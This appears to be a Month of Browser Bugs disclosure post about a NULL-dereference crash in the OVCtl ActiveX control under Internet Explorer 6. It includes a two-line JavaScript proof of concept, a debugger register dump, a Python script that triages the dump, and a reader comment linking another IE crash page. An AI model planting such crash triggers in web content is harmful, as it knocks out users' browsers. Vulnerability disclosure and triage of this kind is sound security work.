MoBB #20: OVCtl NewDefaultItem
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system and requires Outlook to be installed. Calling the NewDefaultItem() method triggers a NULL dereference. This bug was submitted by Alfredo Melloni.
var a = new ActiveXObject('OVCtl.OVCtl.1');
a.NewDefaultItem();
Demonstration
eax=00000000 ebx=00000800 ecx=0013b234
edx=0013b200 esi=00000000 edi=357a3b58
eip=357b07e3 esp=0013b1c4 ebp=0013b240
OUTLCTL!DllUnregisterServer+0x3678:
357b07e3 8b08 mov ecx,[eax] ds:0023:00000000=????????
This bug will be added to the OSVDB:
Microsoft IE OVCtl NewDefaultItem Method NULL Dereference
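As an added triage example (not part of the original post or the reporter's material), the Python below parses the debugger output shown above and checks that the faulting access is a read through a zero base register into unmapped memory near address 0. The function name triage, the 64 KB threshold and the regular expressions are assumptions of this example.

```python
import re

# Debugger output copied from the post (register dump and faulting instruction).
DUMP = """\
eax=00000000 ebx=00000800 ecx=0013b234
edx=0013b200 esi=00000000 edi=357a3b58
eip=357b07e3 esp=0013b1c4 ebp=0013b240
OUTLCTL!DllUnregisterServer+0x3678:
357b07e3 8b08 mov ecx,[eax] ds:0023:00000000=????????
"""

# Assumption: accesses below 64 KB are treated as NULL-pointer accesses, since
# Windows normally leaves that range unmapped in user-mode processes.
NULL_REGION_LIMIT = 0x10000

FAULT_RE = re.compile(
    r"^([0-9a-f]{8})\s+[0-9a-f]+\s+(\w+)\s+(\S+)\s+\w{2}:[0-9a-f]{4}:([0-9a-f]{8})=(\S+)$",
    re.M)

def triage(dump):
    """Classify the faulting access in a WinDbg-style x86 register dump."""
    regs = {n: int(v, 16) for n, v in re.findall(r"\b(e[a-z]{2})=([0-9a-f]{8})\b", dump)}
    m = FAULT_RE.search(dump)
    if m is None:
        raise ValueError("no faulting instruction line with a memory operand found")
    eip, mnemonic, operands, target, value = m.groups()
    if int(eip, 16) != regs.get("eip"):
        raise ValueError("faulting instruction address does not match eip")
    ops = operands.split(",")
    # For mov, a bracketed first operand is the destination (write); otherwise it is a read.
    if mnemonic == "mov":
        kind = "write" if "[" in ops[0] else "read"
    else:
        kind = "access"
    base = re.search(r"\[(e[a-z]{2})\]", operands)  # plain [reg] addressing only
    address = int(target, 16)
    return {
        "kind": kind,
        "address": address,
        "base_register": base.group(1) if base else None,
        "base_is_zero": bool(base) and regs.get(base.group(1)) == 0,
        "unmapped": value == "????????",  # WinDbg prints ? for unreadable memory
        "null_dereference": address < NULL_REGION_LIMIT and value == "????????",
    }

if __name__ == "__main__":
    print(triage(DUMP))
```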
1 Comments:
Several months after reporting this bug, MS gave no reaction. Here's a bug which I found as I tried something with IE and :hover
I am no security expert, so I don't know what to do with this, if it is possible to use it for more than just crashing the IE, ... perhaps you like to find out:
http://www.ernestoruge.de/misc/websites/iecrash/
Have fun!
Infinity - mail@ernestoruge.de